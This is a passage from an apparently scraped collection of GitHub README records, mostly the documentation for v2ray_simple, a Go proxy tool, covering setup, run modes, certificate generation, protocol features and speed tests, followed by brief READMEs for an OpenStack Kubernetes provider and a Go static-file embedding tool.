https://github.com/v2fly/domain-list-community\nmv domain-list-community geosite\n```\n\nThe advantage of downloading through git is that when you want to update, you can directly `git pull`;\n\nThe advantage of downloading through interactive mode or the -d parameter is that if you configure the configuration file and have a node available, the geosite will be downloaded preferentially through your node.\n\n\n### Compile and install\n\n```sh\ngit clone https://github.com/e1732a364fed/v2ray_simple\ncd v2ray_simple/cmd/verysimple && go build\n```\n\nFor detailed optimized compilation parameters, please refer to the Makefile\n\nIf you downloaded the executable directly, you don't need go build\n\nNote that this project starts from v1.1.9, the executable file directory is in the cmd/verysimple folder, and the root directory is the v2ray_simple package.\n\nIn the past, the size of vs was very small, but with the increase of functions, the size has also increased. At present, the tun function takes up the most space. If you compile and use the notun tag, the size can be reduced by 3.5MB. The second is the quic function , canceling it can also reduce the size\n\n## Operation mode\n\nThis work supports a variety of operating modes, which is convenient for students with different needs\n\n1. Command line mode (also called URL mode)\n2. Standard mode (also known as toml mode)\n3. Compatibility mode\n4. Interactive mode\n5. GUI mode\n\nSince v1.2.5, this project has removed the \"minimalist mode\" in json format.\n\n### Preparation before running\n\nIf it is a client, you can run `./verysimple -i` to enter the interactive mode, and choose to download the geosite folder and the geoip file (GeoLite2-Country.mmdb)\n\nCustom configs can be generated via [interactive mode](#interactive mode).\n\n### Command line mode (also known as URL mode)\n\nYou can use the following commands to run without configuration files. -D If not specified, the default is direct\n\n```sh\n#client\nverysimple -L=socks5://127.0.0.1:10800 -D=vlesss://your uuid@your server ip:443?insecure=true\n\n#Server\nverysimple -L=vlesss://your uuid@your server ip:443?cert=cert.pem&key=cert.key&version=0&fallback=:80\n```\n\nThose who are not careful should pay attention, vlesss, you need three s, otherwise you will be streaking, add the third s to indicate the set of tls\n\nThe command line mode does not support features such as dns, diversion, and complex fallback. It can only be configured in the url to fall back by default.\n\nFor the specific writing method of url format, see: [url standard definition](docs/url.md), vs defines a general url format.\n\nThe command line mode is inherited from v2simple, and the idea is that the fewer words, the better.\n\nHowever, it is recommended that students who do not have minimal requirements directly use the standard mode.\n\nIn addition, verysimple inherits one of the advantages of v2simple, that is, the configuration of the server can also be done with url. Who stipulates that url can only be used to share client configuration? A url is definitely easier to configure than json, is not easy to make mistakes.\n\n### Standard Mode\n\n```sh\n#client, standard mode\nverysimple -c client.toml\n#Server, standard mode\nverysimple -c server.toml\n\n```\n\nThe standard mode uses the toml format, which is similar to the ini of windows, which is friendly to novices and is not easy to make mistakes. It is recommended to use standard mode directly.\n\n**Vlesss.client.toml, vlesss.server.toml, multi.client.toml and other files in the examples folder provide a lot of explanatory notes, which are very friendly to novices. You must read them before you can master the configuration Format. **\n\nMost of our toml sample files have certain teaching significance, and I hope users can read them all.\n\n### compatibility mode\n\nA mode compatible with v2ray's json configuration file will be launched in the future. At present, it is planned to only support the v5 format, but it seems that the v5 documentation of the v2ray community is relatively incomplete, so take your time.\n\n### Interactive Mode\n\nInteractive mode can interactively generate a configuration you want on the command line, so that you don\u2019t need various one-click scripts\n\nThe interactive mode has many interesting functions, you can try it, and it is very flexible to use.\n\nRun `verysimple -i` to enter the interactive mode; you can also specify -i when -c specifies the configuration file, so that it can be dynamically adjusted while running.\n\nCurrently supports the following functions:\n\n1. Generate a random ssl certificate\n2. [Interactive generation configuration], super powerful\n3. [Generate share link] <- current configuration\n4. Hot delete configuration\n5. [Hot Reload] New configuration file\n6. [Hot loading] New configuration url\n7. Adjust log level\n8. Adjust hy manual transmission\n9. Generate a random uuid for your reference\n10. Download the geosite folder\n11. Download the geoip file (GeoLite2-Country.mmdb)\n12. Print all protocols supported by the current version\n13. Query current status\n14. Set iptables for tproxy (port 12345)\n15. Remove iptables for tproxy\n\n\nAfter the configuration is generated interactively, it can also be output to a file, loaded into the current operating environment, and generate a sharing link.\n\n### GUI mode\n\nRun verysimple from the distribution starting with vs_gui\n\nThe following is the effect of running on macOS\n\n![](docs/pics/vsgui_baseControl_cb02d3b7.png)\n\n![](docs/pics/vsgui_appControl_cb02d3b7.png)\n\n### other instructions\n\nIf you don't put it in the path, you need `./verysimple`, followed by a dot and a slash. Windows does not have this requirement.\n\n## About certificates\n\n
\n\nGenerate the certificate yourself! And it is best to use the domain name that you really own, and use scripts such as acme.sh to apply for a free certificate, especially when building a website.\n\nAnd after using the real certificate, don't forget to delete `insecure=true` in the configuration file.\n\nUsing a self-signed certificate will be attacked by a man-in-the-middle, and I remind you again. If you are attacked by a man-in-the-middle, you can directly obtain your uuid, and then your server attackers can also use it.\n\nTo apply for a real certificate, only IP is not enough, you must have a domain name. The function of generating random certificates provided by this project is only for quick testing and should not be used in actual situations.\n\n### shell command to generate a self-signed certificate\n\nNote that you will be asked to enter some information when running the second line of command. Make sure at least one line is not blank, such as typing 1\n```sh\nopenssl ecparam -genkey -name prime256v1 -out cert.key\nopenssl req -new -x509 -days 7305 -key cert.key -out cert.pem\n```\n\nThis command will generate an ecc certificate, which is faster than the rsa certificate, which is conducive to speeding up the network speed (accelerating the tls handshake).\n\n#### High-play situations using client certificates:\n\nPlease ignore this paragraph.\n\n```sh\n# Command to generate ca:\nopenssl ecparam -genkey -name prime256v1 -out ca.key\nopenssl req -new -x509 -days 365 -sha256 -key ca.key -out ca.crt #You will be prompted to enter CountryName and other information.\n\n# Use ca to generate client key and crt\nopenssl ecparam -genkey -name prime256v1 -out client.key\nopenssl req -new -key client.key -out client.csr #It will prompt you to enter CountryName and other information.\nopenssl x509 -req -days 365 -sha256 -in client.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out client.crt\n```\n\nAfterwards, ca.crt is used for CA (the server needsConfigure this), client.key and client.crt are used for client certificates (clients need to configure this)\n\nNote that the above two commands for generating crt by openssl use the -sha256 parameter, because the default sha1 is already insecure and has been discarded in go1.18.\n\n### Interactive mode Generate certificate\n\nThe interactive mode of this work also has the function of automatically generating random self-signed certificates\n\nAfter downloading the program on your server, run `verysimple -i` to open the interactive mode, then press the down arrow to find the corresponding option, and press Enter to automatically generate the tls certificate.\n\n
\n\n\n# Technology related\n\n
\n\nTechnical related\n\nvery simple project. When forwarding traffic in this project, the key code is directly placed in main.go! Very straight forward and easy to understand.\n\nIn general, the writing of agents is a very simple matter, belonging to the civilian level.\nAs long as it does not involve the analysis of complex tls, tcp, and ip original protocols, and does not involve the formulation of new proxy protocols, it is quite easy to just make a proxy.\n\n\n## Innovation\n\nThere are many innovations in this work, as follows\n\n### agreement\n\nImplemented the vless protocol (v0, v1)\n\nIn this project, the vless v1 standard was developed and implemented (new features are still being developed), and a non-mux fullcone is added;\n\n### lazy techniques\n\nThis project invented a unique non-magically modified tls package bidirectional splice, this work is called tls lazy encrypt, lazy for short\n\n### grpcSimple\n\nImplemented grpcSimple on the basis of Clash's gun.go (MIT protocol) grpc client code, including a complete server, followed the minimalist concept, did not quote Google's grpc package, reduced the compilation size by 4MB, ** and supports Fall back to h2c**.\n\n\n### Architecture\n\nA simple architecture is used, and a lot of performance can be improved just because of the simplicity of the architecture. And the executable file is much smaller than other kernels.\n\nThis work uses a layered architecture, and the network layer, tls layer, advanced layer, proxy layer and other layers do not affect each other.\n\nAll transmission methods can use utls to disguise fingerprints;\nAll methods can choose network layers such as tcp, udp, unix domain socket, etc., and no longer stick to the network layer design of the original protocol.\n\n### Compatibility and Speed\nThe v0 protocol is directly compatible with the existing v2ray/xray, for example, the client can use any existing client that supports vless, and the server can use verysimple\n\nAfter actual speed measurement, even without using any additional technologies such as lazy encrypt, verysimple as a server is still faster than v2ray as a server. It is also established as a client. The speed measurement of the latest 1.10 seems to be faster than xray's xtls without being lazy. ( [Latest Speed \u200b\u200bTest](docs/speed_macos_1.1.0.md) )\n\n### Command Line\n\nThe command line interface of this work also has an \"interactive mode\", welcome to download and experience, use the `-i` parameter to open. PRs are also welcome to enrich the functionality of the interactive mode.\n\n### Implemented useful features beyond innovation\n\nIt supports trojan protocol and smux, and after speed test, it is faster than trojan-go. (The speed difference is basically the same as the difference between the vless of this work and the vless of v2ray, so the speed test file will not be released, just refer to vless)\n\nAutomatically download mmdb when there is no mmdb file\n\nSpeed \u200b\u200bup with readv\n\nOther listening protocols also support socks5, http, dokodemo, vmess, simplesocks, shadowsocks, etc.\n\nA variety of configuration file formats, including its own toml standard format\n\nDefault fallback, and fallback by path/sni/alpn\n\nSplit by geoip, geosite, ip, cidr, domain, tag, network, and split by country top-level domain name, using mmdb and v2fly community maintenance domain name list\n\nSupport utls to disguise tls fingerprints, the utls in this work can also be used when using websocket and grpc\n\nSupport websocket, use the gobwas/ws package with the highest performance, support the 0-rtt method of early data, it should be compatible with the existing xray/v2ray\n\nsupports grpc, compatible with xray/v2ray; also grpcSimple, see above.\n\nTrue nginx refuses to respond.\n\nSupport quic and hysteria resistance control, compatible with xray/v2ray (see wiki for details), and newly developed \"manual transmission\" mode\n\napi server; tproxy transparent proxy; http header (that is, so-called obfuscation, camouflage header, etc.), and fallback is also supported in this mode.\n\nThis work supports trojan-go's \"pluggable modules\" mode. And you can also use build tag to turn on or turn off a certain function. However, for the sake of speed, the coupling is higher.\n\nThis work also supports the \"use as library\" of clash, and it is very simple. You can understand it by reading the godoc document. The main project has only one main function.\n\nSupport Docker container, see #56, and cmd/verysimple/Dockerfile, relatedFor questions, please find the PR author.\n\nVarious third-party sharing link formats can be generated;\n\nIn short, it can be seen that this work has certain optimizations in almost every technology, surpassing other cores, very Nice.\n\n## Technical details\n\nAlthough this work claims to be v2ray_simple, the actual concept is closer to clash and trojan-go, and I appreciate these two packages more than v2ray.\n\nThis is why I wrote a v2ray_simple separately. The structure of v2ray is really backward and unable to show its strength, while clash and trojan-go are much more advanced.\n\n\nAt present, it is believed that only the protocol whose outer layer is tls and supports fallback is the mainstream.\n\nAnd vmess, a protocol with too much information entropy, should have withdrawn from the stage of history. However, the recent sni blocking behavior of the wall hit me in the face again. It seems that a completely random protocol like vmess/ssr still needs to be used. . .\n\nIn conclusion, the world is always changing and technology adoption needs to be adaptable.\n\n\n### About vless v1\n\nThe v1 here is formulated by verysimple itself, and it is always necessary to cross the river by feeling the stones. For a discussion of the standard see [vless_v1](docs/vless_v1.md)\n\nIn short, the protocol format was simply revised, and then the fullcone was improved.\n\nverysimple implements a fullcone of udp over tcp with an original non-mux type \"separate channel\" method\n\nThere are many other new designs in v1, such as connection pool and dns, etc., see [vless_v1_discussion](docs/vless_v1_discussion.md) for details\n\nThe vless v1 protocol is still in the development stage, and I may add or modify definitions at any time.\n\nBecause this work is the first to propose the development of vless v1, the version number of this work also directly starts from v1.0.0 (manual dog head ~)\n\n### about udp\n\nThis project fully supports udp\n\nThe latest code has fully supported vless v0\n\nLater, I implemented vless v1 by myself, which naturally supports udp and fullcone. v1 is still in the testing and development stage.\n\nIn addition, the above mentioned that the bearer data supports udp; the underlying transmission method of our protocol also fully supports udp. That is to say, udp can be used to transmit vless data, and then udp bearer data can also be transmitted in vless.\n\nIf the bottom layer uses udp transmission, it can be understood as a lower-level mode than v2ray's mkcp transmission mode, directly using udp transmission without any control. So there may be packet loss, resulting in poor speed and instability.\n\n### tls lazy encrypt (splice)\n\n** Note that this function is not compatible with xtls due to different technical implementations. **, Because we need to do a lot of work in order to be able to filter outside the tls package, so the technical implementation is different from xtls.\n\n**The lazy function is compatible with xtls, but it is not compatible with xtls. If you use lazy, you must use verysimple at both ends**\n\nRegarding xtls, you can also read my research article on the 233 vulnerability of xtls\n\nhttps://github.com/e1732a364fed/xtls-\n\n\nIn the latest code, two-way tls lazy encrypt is implemented, which is another implementation of splice of xtls. The bottom layer also calls splice. In order to distinguish this method, this package calls this method tls lazy encrypt.\n\nThe tls lazy encrypt feature can be turned on with the -lazy parameter at runtime (the server and client must be turned on), and then the tls detection output can be printed with the -pdd parameter\n\nWhen the system does not support the splice and sendfile system calls, the lazy feature is equivalent to the direct flow control of xtls.\n\nBecause it is bidirectional, and the splice of xtls is unidirectional, so theoretically tls lazy encrypt is faster than xtls, should it be exactly twice as fast? don't know. Anyway, I use splice for both reading and writing.\n\nMoreover, this technology is not implemented by magically modifying the tls package, but is implemented outside of tls. There will be no 233 vulnerabilities of xtls that I mentioned, and it can cooperate with utls to simulate fingerprints in the future.\n\nRegarding splice, you can also refer to my article https://github.com/e1732a364fed/xray_splice-\n\nThis feature is not completely stable, and may cause some web page access to be abnormal sometimes, and sometimes bad mac alert appears; refreshing the page can solve the problem\n\nIt's not that the speed is slow, it's because the current tls filtering method has some problems, and it doesn't handle close_alert and other situations well. And using different browsers, the phenomenon will be different\n\nIn my latest code, a unique technique has been used to avoid most of the instability. In short, it is more suitable for watching videos. After all, two-way splice is not free!\n\nAfter my later thinking, I found that the splice of xtls is one-way because it needs to filter out some alerts when writing, otherwise it is easy to be detected;\n\nBut according to [a report by gfwrev](https://twitter.com/gfwrev/status/1327670741597179906), there will still be a lot of direct copyingproblem, hard to solve\n\nSo since the problem cannot be solved, it is better to apply two-way splice directly without filtering any alert problems. Broken cans.\n\nIn short, this splice thing is only suitable for playing around, xtls and all similar copying and direct connection technologies are unreliable. I'm just putting it here for practice. Just play around with everyone.\n\nI just try it out on the intranet myself, and never really use it for purposes that require high security.\n\nWe should also look at an existing \"speed reduction\" problem of splice, (linux forward configuration problem), we will also exist here https://github.com/XTLS/Xray-core/discussions/59\n\n\n\n#### Summarize the technical advantages of tls lazy encrypt (tle)\n\nSolved the following pain points of xtls\n\n1. 233 vulnerabilities\n2. Only one-way splice\n3. Can't work with fullcone\n4. Unable to cooperate with utls\n\nreason:\n\n1. tle does not use loops for tls filtering, and does not modify tls packets\n2. tle directly enables two-way splice; xtls can only optimize client performance, and both ends of tle will be optimized; generally speaking, most servers are Linux, so this greatly improves the performance of all connections.\n3. Because the fullcone of tle's vless v1 is non-mux and separates channels, it is said that splice can be applied (support will be added in the future, and some codes may need to be added, which needs to be investigated)\n4. Because tle does not modify the tls package, it can be used with any tls package, such as utls, which has been added at present. So you can enjoy the splice while enjoying the camouflage\n\nAnd the alert does not need to be filtered at all, because there are still two issues after xtls itself is filtered, right?\n\nAnd it can be considered later, if the bottom layer uses tls1.2, then our upper layer can also use tls1.2 to shake hands. This can be done, because the underlying judgment can be done when the client handshake just happens, and at this time we judge first, and then initiate the connection to the server.\n\nThere is also a possibility that the client's application is with tls1.3, but the target server returns tls1.2, which is also possible, for example, the target server is relatively old, or the tls1.3 function is deliberately disabled; at this time We can consider developing a new technology to bypass it, and put it in the vless v1 technology stack. See https://github.com/e1732a364fed/v2ray_simple/discussions/2\n\nWhen the new protocol is not used, lazy can only solve this problem by not lazy tls1.2, that is, naked forwarding tls1.3 and encrypted forwarding tls1.2.\n\n## About embedded geoip files\n\nThe default Makefile or direct go build does not enable the built-in function, and the external mmdb file needs to be loaded, which means that you have to download the mmdb file yourself.\n\n**However, the latest version will be automatically detected, if you do not have mmdb file, it will be downloaded from CDN automatically, so it is already very convenient, no need to do it yourself.**\n\nCan be downloaded from https://github.com/P3TERX/GeoLite.mmdb project, https://github.com/Loyalsoldier/geoip project, or similar\n\nLoaded external files must use the original mmdb format.\n\nIf you want to compile inline, use `tar -czf GeoLite2-Country.mmdb.tgz GeoLite2-Country.mmdb` to package it, put the generated tgz file in the netLayer folder, and then compile it, use `go build - tags embed_geoip` compile\n\nThe file name used for inline compilation must be GeoLite2-Country.mmdb.tgz\n\n\nBecause in order to reduce the file size, the gzip format is embedded instead of the original mmdb\n\n## Development standards and concepts\n\nKISS, Keep it Simple and Stupid\n\nAs many documents as possible and as little code as possible. At the same time, this work does not pursue extreme modularity, but can be properly coupled. Everything is prioritized with speed and easy-to-understand\n\nIf you read the code, you may sometimes see some \"dirty\" code, such as some goto jumps, or functions with complicated steps.\nBut if you think about it carefully and compare it, you will find that this kind of code either runs faster or is more intuitive and easy to understand.\n\nFor example, in some places where defer is required, we deliberately do not defer, but place it in front of each return separately. This is because defer reduces performance. There are many similar places.\n\nOf course, if the advantages of beautifying the code outweigh the disadvantages, we will definitely improve it slowly in the later stage.\n\n### Documentation\n\nThe documentation and comments should be as detailed as possible, and should be completely in Chinese, and try to meet the various recommended standards of golang.\n\nAccording to the standard of golang, the comment is the document itself (the principle of godoc), so you must write more comments. Don't think that if the explanation is repeated, don't write it, because to generate a godoc document, when it is shown to users on pkg.go.dev, they will first see the comment content, not the code content\n\nThe documentation generated by this project is at https://pkg.go.dev/github.com/e1732a364fed/v2ray_simple\n\nheavy againThe more documents the better, the lower the barrier to entry for developers as much as possible.\n\nSometimes I also post some research and discussion articles in the discussion, and everyone should speak up\nhttps://github.com/e1732a364fed/v2ray_simple/discussions\n\n\n### code\n\nThe concept of code is minimalism! This is where the name of the project comes from!\n\nAccording to the principle of Occam's razor, don't engage in a lot of complicated mechanisms, the simplest code that can be implemented is the best code.\n\n**Students who want to contribute to this work must learn these concepts of this work and be able to implement your code. **\n\n**We will eliminate or correct codes that are not minimalist or not clearly explained. **\n\nStudents who have contribution ideas, please read [Contributing Guidelines for Developers] in [CONTRIBUTING](CONTRIBUTING.md) / issue.\n\n#### Getting Started Guide for Developers\n\nFirst learn to use verysimple, familiarize yourself with this README.md and the configuration files under examples/.\n\nAfterwards, read the comments in doc.go and cmd/verysimple/version.go to gain an understanding of the structure of this work. Then read proxy/doc.go to understand the VSI model.\n\nThen learn the proxy.BaseInterface interface and its implementation of proxy.Base. Then learn the various interfaces in advLayer.\n\nAfter that, you can choose the places you are interested in to read in go doc.\n\n## The open source protocol used by this project\n\nThe MIT agreement, that is, when you use it, you must also attach an MIT file, and then the author does not bear any responsibility, obligation, or consequence.\n\n## history\n\nFirst read the v2simple project, a good enlightenment project:\nhttps://github.com/jarvisgally/v2simple\n\nAfter reading v2simple, I forked a version, but the original author did not attach any open source agreement, and the original author's architecture is still a bit lacking.\n\nLater, it was completely refactored directly, and this project was newly built, using its own code completely. Unexpectedly, there will be great development, and the achievements will be overwhelming.\n\nHowever, this work inherits the spirit of v2simple, that is, try to be as simple as possible. I strongly support this spirit, and I try to make this spirit manifest everywhere in the verysimple project.\n\nThis work inherits its following characteristics:\n\n1. The method of url configuration\n2. The forwarding logic is placed directly in main.go\n3. Simple architecture\n\n\n## This work is an inspiration for other projects\n\nGood things are always imitated, but some things are never surpassed. We are imitating others, and others are imitating us, unknowingly co-creating a better and better open source environment.\n\n### v2ray project\nAfter the further development of vless v1 was advocated in this work, the v2ray project directly decided to abandon the vless protocol. (Manual dog head ~)\n\n### xray project\nThis work's advanced research on xtls vulnerabilities and lazy technology inspired the xray project, and a few months later, it developed vision flow control. This work is also considered to have made some contributions to the agency industry~.\n\nHowever, the architecture of xray is too complicated, and it is difficult to apply this flow control to all protocols. And because of the excellent structure of this work, lazy can be directly used for any protocol without internal encryption, such as vless, trojan, simplesocks, socks\n\nThis work directly supports utls after grpc is implemented, and xray will follow up through the developer's PR a few months later.\n\n### sing-box project\nThis is the first research on the gun-lite client, and reversely launched the gun-lite server code. A few months later, sing-box also followed up through a developer's PR, but it still does not support grpcSimple's unique function of falling back to h2\n\nThis may be because the architecture of sing-box is similar to that of v2ray/xray, which are more complicated and difficult to use. In order to support the fall of h2, some special skills are required.\n\n\n## Development Plan\n\nlong-term plan\n\n1. Improve and implement the vless v1 protocol\n2. When you start a verysimple_c project, write it in c language; that is to say, even if this verysimple does not have any technological innovation, the simple structure alone has technical advantages, which can be used as a reference to implement a lower-level c language implementation. Later, I thought that naiveproxy could be added, but it was actually not that simple.\n3. The verysimple_rust project. Ditto.\n4. Improve tls lazy encrypt technology\n5. Connection pool technology, can reuse the connection with the server to initiate a new request\n6. The handshake delay window technology can be used to divert part of the traffic and send it using mux to achieve the purpose of accurately reducing delay; then sporadic links still use separate channels.\n\n\nPlease refer to other development plans\nhttps://github.com/e1732a364fed/v2ray_simple/discussions/3\n\n\n\n## Ways of identifying\n\nFor functional golang test, use `go test ./... -count=1` command. If you want to print out the test process in detail, you can add the -v parameter\n\nIntranet test command example:\n\nIn the cmd/verysimple folder, open two terminals,\n```\n./verysimple -c ../../examples/quic.client.toml -ll 0\n```\n\n```\n./verysimple -c ../../examples/quic.server.toml -ll 0\n```\n\n
\n\n\n## speed test\n\nTest environment: ubuntu virtual machine, using open source testing tools\nhttps://github.com/librespeed/speedtest-go\n\nAfter compiling and running, it will monitor 8989. Note that according to the requirements of speedtest-go, put the web/asset folder and a toml configuration file into the folder of the executable file. We compile it directly in the project folder, so move it directly to the root of the project folder. Can\n\nThen set up the nginx front-end on the intranet, add a self-signed certificate, and configure and add anti-generation:\n`proxy_pass http://127.0.0.1:8989;`\nThen speedtest-go post.\n\nThen verysimple opens the client and server at the same time locally, and then configures the browser firefox to use the socks5 proxy to connect to our verysimple client\n\nNote that you must visit https when accessing the speed test web page, otherwise the splice speed measured is actually the normal tls speed, and there is no real splice.\n\nVisit https://your own ip/example-singleServer-full.html\nNote that your own ip cannot be 127.0.0.1, because the local loopback will never pass through the proxy, and it must be configured as your own LAN ip.\n\n### About readv and speed test\n\nIf you measure the speed of the intranet according to the above guidance, readv may actually cause a deceleration effect. For details, please refer to\nhttps://github.com/e1732a364fed/v2ray_simple/issues/14\n\nIf you notice a slowdown, you want to turn off readv\n\n### result\n\nDownload on the left, upload on the right, unit Mbps. The performance of my virtual machine is too bad, so even the internal network connection speed is very low.\n\nHowever, this can just measure the gap between different proxy agreements.\n\nverysimple version v1.0.3\n\n```\n// direct connection\n156,221\n163, 189\n165,226\n162,200\n\n\n//verysimple, vless v0 + tls\n145,219\n152, 189\n140,222\n149, 203\n\n//verysimple, vless v0 + tls + tls lazy encrypt (splice):\n\n161, 191,\n176, 177\n178,258\n159, 157\n```\n\nFor detailed speed measurement, please refer to several other documents, docs/speed_macos.md and docs/speed_ubuntu.md.\n\nIn short, it can be seen that verysimple is the absolute king. Although sometimes lazy is not stable enough, but I will further optimize this problem.\n\nWhen measuring speed, open as few windows as possible, and only leave the browser window at the forefront. Redundant windows have been shown to impact rate. Especially in this kind of situation that consumes CPU performance, it is really necessary to ensure that other pressure on the CPU is minimized on a computer with a core display.\n\n## Communication and Ideas\n\nThere are definitely groups. Only in this mountain, the clouds are deep. In fact, every group may be a verysimple group, and every member may be a verysimple author.\n\nIf you really can't find a group, you might as well create one yourself. I hope everyone can stand up and proudly say, \"I am the original author\", and be able to explain their understanding of verysimple's architecture endlessly. The key is not who is the author. When one author falls, tens of thousands of authors will stand up.\n\nIf the author of this work suddenly stops updating, anyone is allowed to fork and take over in the name of the verysimple author. You just need to claim that you are the original author, forget the password of github and your mailbox, and have to reopen it, it will be ok.\n\ntelegram channel: https://t.me/+r5hKQKYyeuowMTcx\n\n\n# Disclaimer and Acknowledgments\n\n## Disclaimer\n\nMIT protocol! The author assumes no responsibility. This project is suitable for intranet testing and suitable for reading code to understand the principle.\n\nIf you use it for any other purpose, we will not help you.\n\nWe will only help friends who study theory.\n\nAt the same time, we are not responsible for projects such as v2ray/xray.\n\n\n## Acknowledgments\n\nTo support hysteria's congestion control, copied brutal.go and pacer.go from pkg/congestion of [hysteria](https://github.com/HyNetwork/hysteria) into our quic folder.\n\nThe client implementation part of grpcSimple borrows the code of gun from clash, and this file belongs to the MIT license alone. (clash's gun is borrowed from Qv2ray's gun)\n\ntproxy borrows from [this](https://github.com/LiamHaworth/go-tproxy/), (trojan-go also borrows from it; it has several bugs, which have been fixed in this work)\n\nThe code from v2ray includes: quic sniffing, geosite file parsing (v2fly/domain-list-community), ShakeSizeParser and openAEADHeader functions of vmess.\n\n(grpc referenced v2ray but did not copy it directly, but wrote it by itself. The code looks like the main reason is the characteristics of protobuf and grpc Google package, so as long as the code is compatible, it must be very similar when written)\n\nThe codes referenced above are all under the MIT license.\n\nThe client code of vmess comes from [clash](https://github.com/Dreamacro/clash/transport/vmess), using the GPLv3 license. The protocol is placed directly under the proxy/vmess/ folder.\n\nAt the same time, the corresponding server code is reversed through the vmess client code.\n\nThe code of tun comes from [tun2socks](https://github.com/xjasonlyu/tun2socks), using the GPLv3 license. The protocol is placed directly under the netLayer/tun folder.\n\n## Stargazers over time\n\n[![Stargazers over time](https://starchart.cc/e1732a364fed/v2ray_simple.svg)](https://starchart.cc/e1732a364fed/v2ray_simple)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes/cloud-provider-openstack", "link": "https://github.com/kubernetes/cloud-provider-openstack", "tags": ["openstack", "kubernetes", "cloud-controller-manager", "csi-plugin", "k8s-sig-cloud-provider", "k8s-sig-storage"], "stars": 503, "description": null, "lang": "Go", "repo_lang": "", "readme": "# Cloud Provider OpenStack\n\nThank you for visiting the `Cloud Provider OpenStack` repository!\n\nThis Repository hosts various plugins relevant to OpenStack and Kubernetes Integration\n\n* [OpenStack Cloud Controller Manager](/docs/openstack-cloud-controller-manager/using-openstack-cloud-controller-manager.md/)\n* [Octavia Ingress Controller](/docs/octavia-ingress-controller/using-octavia-ingress-controller.md/)\n* [Cinder CSI Plugin](/docs/cinder-csi-plugin/using-cinder-csi-plugin.md/)\n* [Keystone Webhook Authentication Authorization](/docs/keystone-auth/using-keystone-webhook-authenticator-and-authorizer.md/)\n* [Client Keystone](/docs/keystone-auth/using-client-keystone-auth.md/)\n* [Manila CSI Plugin](/docs/manila-csi-plugin/using-manila-csi-plugin.md/)\n* [Barbican KMS Plugin](/docs/barbican-kms-plugin/using-barbican-kms-plugin.md/)\n* [Magnum Auto Healer](/docs/magnum-auto-healer/using-magnum-auto-healer.md/)\n\n**NOTE:**\n\n* Cinder Standalone Provisioner, Manila Provisioner and Cinder FlexVolume Driver were removed since release v1.18.0.\n* Version 1.17 was the last release of Manila Provisioner, which is unmaintained from now on. Due to dependency issues, we removed the code from master but it is still accessible in the [release-1.17](https://github.com/kubernetes/cloud-provider-openstack/tree/release-1.17) branch. Please consider migrating to Manila CSI Plugin.\n* Start from release v1.26.0, neutron lbaasv1 support is removed and only Octavia is supported.\n\n## Developing\n\nRefer to [Getting Started Guide](/docs/developers-guide.md/) for setting up development environment and contributing.\n\n## Contact\n\nPlease join us on [Kubernetes provider-openstack slack channel](https://kubernetes.slack.com/messages/provider-openstack)\n\nProject Co-Leads:\n* @lxkong - Lingxian Kong\n* @ramineni - Anusha Ramineni\n* @chrigl - Christoph Glaubitz\n* @jichenjc - Chen Ji\n\n## License\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n[http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bouk/staticfiles", "link": "https://github.com/bouk/staticfiles", "tags": [], "stars": 502, "description": "staticfiles compiles a directory of files into an embeddable .go file", "lang": "Go", "repo_lang": "", "readme": "# DEPRECATED\n\nGo 1.16 has file embedding built-in, you should use that!\n\n# staticfiles\n\nStaticfiles allows you to embed a directory of files into your Go binary. It is optimized for performance and file size, and automatically compresses everything before embedding it. Here are some of its features:\n\n* Compresses files, to make sure the resulting binary isn't bloated. It only compresses files that are actually smaller when `gzip`ped.\n* Serves files `gzip`ped (while still allowing clients that don't support it to be served).\n* Ignores hidden files (anything that starts with `.`).\n* Fast. The command-line tool reads and compresses files in parallel, and the resulting Go file serves files very quickly, avoiding unnecessary allocations.\n* No built-in development mode, but makes it very easy to implement one (see [local development mode](#local-development-mode)).\n\nIt has some clever tricks, like only compressing a file if it actually makes the binary smaller (PNG files won't be compressed, as they already are and compressing them again will make them bigger).\n\nI recommend creating a separate package inside your project to serve as the container for the embedded files.\n\n## Example\n\nFor an example of how to use the resulting package, check out `example/example.go`. You can also see the API it generates at [godoc.org](https://godoc.org/bou.ke/staticfiles/files).\n\n## Installation\n\nInstall with\n\n```\ngo get bou.ke/staticfiles\n```\n\n## Usage\n\nSimply run the following command (it will create the result directory if it doesn't exist yet):\n\n```\nstaticfiles -o files/files.go static/\n```\n\nI recommend putting it into a `Makefile` as follows:\n\n```\nfiles/files.go: static/*\n\tstaticfiles -o files/files.go static/\n```\n\nThe `staticfiles` command accept the following arguments:\n\n```\n--build-tags string\n Build tags to write to the file\n-o string\n File to write results to. (default \"staticfiles.go\")\n--package string\n Package name of the resulting file. Defaults to name of the resulting file directory\n```\n\n## Local development mode\n\nWhile Staticfiles doesn't have a built-in local development mode, it does support build tags which makes implementing one very easy. Simply run `staticfiles` with `--build-tags=\"!dev\"` and add a file in the same directory that implements the same API, but with `//+build dev` at the that and using `http.FileServer` under the hood. You can find an example in `files/files_dev.go`. Once you have that set up you can simply do `go build --tags=\"dev\"` to compile the development version. In the way I set it up, you could even do `go build --tags=\"dev\" -ldflags=\"-X bou.ke/staticfiles/files.staticDir=$(pwd)/static\"` to set the static file directory to a specific path.\n\n## API\n\nThe resulting file will contain the following functions and variables:\n\n### `func ServeHTTP(http.ResponseWriter, *http.Request)`\n\n`ServeHTTP` will attempt to serve an embedded file, responding with gzip compression if the clients supports it and the embedded file is compressed.\n\n### `func Open(name string) (io.ReadCloser, error)`\n\n`Open` allows you to read an embedded file directly. It will return a decompressing `Reader` if the file is embedded in compressed format. You should close the `Reader` after you're done with it.\n\n### `func ModTime(name string) time.Time`\n\n`ModTime` returns the modification time of the original file. This can be useful for caching purposes.\n\n### `NotFound http.Handler`\n\n`NotFound` is used to respond to a request when no file was found that matches the request. It defaults to `http.NotFound`, but can be overwritten.\n\n### `Server http.Handler`\n\n`Server` is simply `ServeHTTP` but wrapped in `http.HandlerFunc` so it can be passed into `net/http` functions directly.\n", 